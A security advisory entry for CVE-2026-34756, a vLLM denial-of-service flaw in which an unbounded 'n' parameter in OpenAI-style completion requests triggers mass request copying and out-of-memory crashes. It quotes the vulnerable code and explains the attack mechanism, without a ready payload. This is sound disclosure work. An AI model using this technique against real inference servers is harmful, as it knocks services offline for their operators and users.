GHSA-3mwp-wvh9-7528

Suggest an improvement
Source
https://github.com/advisories/GHSA-3mwp-wvh9-7528
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-3mwp-wvh9-7528/GHSA-3mwp-wvh9-7528.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3mwp-wvh9-7528
Aliases
  • CVE-2026-34756
Published
2026-04-03T15:35:48Z
Modified
2026-04-03T15:50:59.028452Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
vLLM: Unauthenticated OOM Denial of Service via Unbounded `n` Parameter in OpenAI API Server
Details

Summary

A Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Due to the lack of an upper bound validation on the n parameter in the ChatCompletionRequest and CompletionRequest Pydantic models, an unauthenticated attacker can send a single HTTP request with an astronomically large n value. This completely blocks the Python asyncio event loop and causes immediate Out-Of-Memory crashes by allocating millions of request object copies in the heap before the request even reaches the scheduling queue.

Details

The root cause of this vulnerability lies in the missing upper bound checks across the request parsing and asynchronous scheduling layers:

  1. Protocol Layer: In vllm/entrypoints/openai/chat_completion/protocol.py, the n parameter is defined simply as an integer without any pydantic.Field constraints for an upper bound.

    class ChatCompletionRequest(OpenAIBaseModel):
        # Ordered by official OpenAI API documentation
        # https://platform.openai.com/docs/api/reference/chat/create
        messages: list[ChatCompletionMessageParam]
        model: str | None = None
        frequency_penalty: float | None = 0.0
        logit_bias: dict[str, float] | None = None
        logprobs: bool | None = False
        top_logprobs: int | None = 0
        max_tokens: int | None = Field(
            default=None,
            deprecated="max_tokens is deprecated in favor of "
            "the max_completion_tokens field",
        )
        max_completion_tokens: int | None = None
        n: int | None = 1
        presence_penalty: float | None = 0.0
    
  2. SamplingParams Layer (Incomplete Validation): When the API request is converted to internal SamplingParams in vllm/sampling_params.py, the _verify_args method only checks the lower bound (self.n < 1), entirely omitting an upper bounds check.

        def _verify_args(self) -> None:
            if not isinstance(self.n, int):
                raise ValueError(f"n must be an int, but is of type {type(self.n)}")
            if self.n < 1:
                raise ValueError(f"n must be at least 1, got {self.n}.")
    
  3. Engine Layer (The OOM Trigger): When the malicious request reaches the core engine (vllm/v1/engine/async_llm.py), the engine attempts to fan out the request n times to generate identical independent sequences within a synchronous loop.

            # Fan out child requests (for n>1).
            parent_request = ParentRequest(request)
            for idx in range(parent_params.n):
                request_id, child_params = parent_request.get_child_info(idx)
                child_request = request if idx == parent_params.n - 1 else copy(request)
                child_request.request_id = request_id
                child_request.sampling_params = child_params
                await self._add_request(
                    child_request, prompt_text, parent_request, idx, queue
                )
            return queue
    

    Because Python's asyncio runs on a single thread and event loop, this monolithic for-loop monopolizes the CPU thread. The server stops responding to all other connections (including liveness probes). Simultaneously, the memory allocator is overwhelmed by cloning millions of request object instances via copy(request), driving the host's Resident Set Size (RSS) up by gigabytes per second until the OS OOM-killer terminates the vLLM process.

Impact

Vulnerability Type: Resource Exhaustion / Denial of Service

Impacted Parties: - Any individual or organization hosting a public-facing vLLM API server (vllm.entrypoints.openai.api_server), which happens to be the primary entrypoint for OpenAI-compatible setups. - SaaS / AI-as-a-Service platforms acting as reverse proxies sitting in front of vLLM without strict HTTP body payload validation or rate limitations.

Because this vulnerability exploits the control plane rather than the data plane, an unauthenticated remote attacker can achieve a high success rate in taking down production inference hosts with a single HTTP request. This effectively circumvents any hardware-level capacity planning and conventional bandwidth stress limitations.

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T15:35:48Z",
    "severity": "MODERATE",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-770"
    ]
}
References

Affected packages

PyPI / vllm

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0.1.0
Fixed
0.19.0

Affected versions

0.*
0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.2.0
0.2.1
0.2.1.post1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.7
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.0.post1
0.4.1
0.4.2
0.4.3
0.5.0
0.5.0.post1
0.5.1
0.5.2
0.5.3
0.5.3.post1
0.5.4
0.5.5
0.6.0
0.6.1
0.6.1.post1
0.6.1.post2
0.6.2
0.6.3
0.6.3.post1
0.6.4
0.6.4.post1
0.6.5
0.6.6
0.6.6.post1
0.7.0
0.7.1
0.7.2
0.7.3
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1
0.9.0
0.9.0.1
0.9.1
0.9.2
0.10.0
0.10.1
0.10.1.1
0.10.2
0.11.0
0.11.1
0.11.2
0.12.0
0.13.0
0.14.0
0.14.1
0.15.0
0.15.1
0.16.0
0.17.0
0.17.1
0.18.0
0.18.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-3mwp-wvh9-7528/GHSA-3mwp-wvh9-7528.json"